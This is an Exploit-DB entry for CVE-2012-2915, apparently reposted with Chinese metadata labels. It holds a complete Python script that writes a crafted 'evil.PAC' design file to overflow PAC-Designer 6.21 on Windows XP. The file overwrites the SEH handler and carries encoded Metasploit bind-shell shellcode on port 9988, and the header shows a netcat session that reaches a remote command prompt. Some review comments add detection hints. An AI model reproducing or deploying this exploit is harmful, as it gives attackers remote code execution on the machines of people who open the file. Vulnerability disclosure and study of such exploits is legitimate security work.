Lattice Semiconductor PAC-Designer 6.21 – ‘.PAC’ Local Overflow

  • 作者: b33f
    日期: 2012-06-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19006/
  • #!/usr/bin/python -w
    
    #------------------------------------------------------------------------------------#
    # Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) #
    # CVE: CVE-2012-2915 #
    # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/#
    # OS: WinXP SP1#
    # Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
    #------------------------------------------------------------------------------------#
    # I didn't dig too deep, but portability to other OS builds does not look promising #
    # due to SafeSEH and bad characters in the application modules. #
    #------------------------------------------------------------------------------------#
    # root@bt:~# nc -nv 192.168.111.130 9988 #
    #(UNKNOWN) [192.168.111.130] 9988 (?) open #
    #Microsoft Windows XP [Version 5.1.2600] #
    #(C) Copyright 1985-2001 Microsoft Corp. #
    ##
    #C:\Documents and Settings\Owner\Desktop>#
    #------------------------------------------------------------------------------------#
    
    # Name of the crafted design file; it is a relative path, so the file is
    # written to the current working directory.
    filename="evil.PAC"
    
    # XML prefix of a PAC-Designer document. It ends at the opening <Value> tag of
    # a <Symbol> entry, so whatever is concatenated after PAC1 becomes the text
    # content of that element.
    # NOTE(review): this placement suggests the overflow is reached while the
    # application handles a symbol's <Value> text -- inferred from the layout
    # only, not confirmed by anything in this file.
    PAC1 = """<?xml version="1.0"?>
    
    <PacDesignData>
    
    <DocFmtVersion>1</DocFmtVersion>
    <DeviceType>ispPAC-CLK5410D</DeviceType>
    
    <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
    
    <SummaryInformation>
    <Title>Oops..</Title>
    <Author>b33f</Author>
    </SummaryInformation>
    
    <SymbolicSchematicData>
    <Symbol>
    <SymKey>153</SymKey>
    <NameText>Profile 0 Ref Frequency</NameText>
    <Value>"""
    
    #------------------------------------------------------------------------------------#
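    # The byte string below was generated with: #
    # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c#
    # [*] x86/alpha_mixed succeeded with size 744 (iteration=1)#
    # It is a bind shell, so an unexpected listener on TCP 9988 is the host-side sign. #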
    #------------------------------------------------------------------------------------#
    shellcode = (
    "\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
    "\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
    "\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
    "\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
    "\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
    "\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
    "\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
    "\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
    "\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
    "\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
    "\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
    "\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
    "\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
    "\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
    "\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
    "\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
    "\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
    "\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
    "\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
    "\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
    "\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
    "\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
    "\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
    "\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
    "\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
    "\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
    "\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
    "\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
    "\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
    "\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
    "\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
    "\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
    "\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
    "\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
    "\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
    "\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
    "\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
    "\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
    "\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
    "\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
    "\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
    "\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
    "\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
    "\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
    "\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
    "\x70\x30\x53\x79\x6f\x68\x55\x41\x41")
    
    #------------------------------------------------------------------------------------#
    # SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll#
    # nSEH: \xEB\x05 #
    #------------------------------------------------------------------------------------#
    # Content placed inside the <Value> element, in order:
    #   98 filler bytes, the 6 bytes that the comment box above labels nSEH
    #   (\xEB\x05) and SEH (0x77512879, stored little-endian), 20 bytes of \x90
    #   followed by the encoded payload, then "C" padding.
    # The padding term is 5000 - len(b00m), so the element content always comes
    # to 98 + 6 + 5000 = 5104 bytes regardless of payload size.
    # NOTE(review): a <Value> of several kilobytes, or one containing bytes
    # outside printable ASCII, is a usable signal when scanning .PAC files --
    # this assumes legitimate values are short; confirm against real design files.
    b00m = "\x90"*20 + shellcode
    payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))
    
    # XML suffix: closes the <Value>, <Symbol>, <SymbolicSchematicData> and
    # <PacDesignData> elements that PAC1 leaves open.
    PAC2 = """</Value>
    </Symbol>
    </SymbolicSchematicData>
    
    </PacDesignData>"""
    
    # Assemble the document: XML prefix, oversized <Value> content, XML suffix.
    buffer = PAC1 + payload + PAC2
    
    # Write the document to `filename` in text mode. The script only produces a
    # file; it does not interact with the application itself.
    # NOTE(review): per the header this targets PAC-Designer 6.21 on WinXP SP1,
    # presumably when the application parses the file -- .PAC files from
    # untrusted sources should be treated as potentially hostile input.
    textfile = open(filename , 'w')
    textfile.write(buffer)
    textfile.close()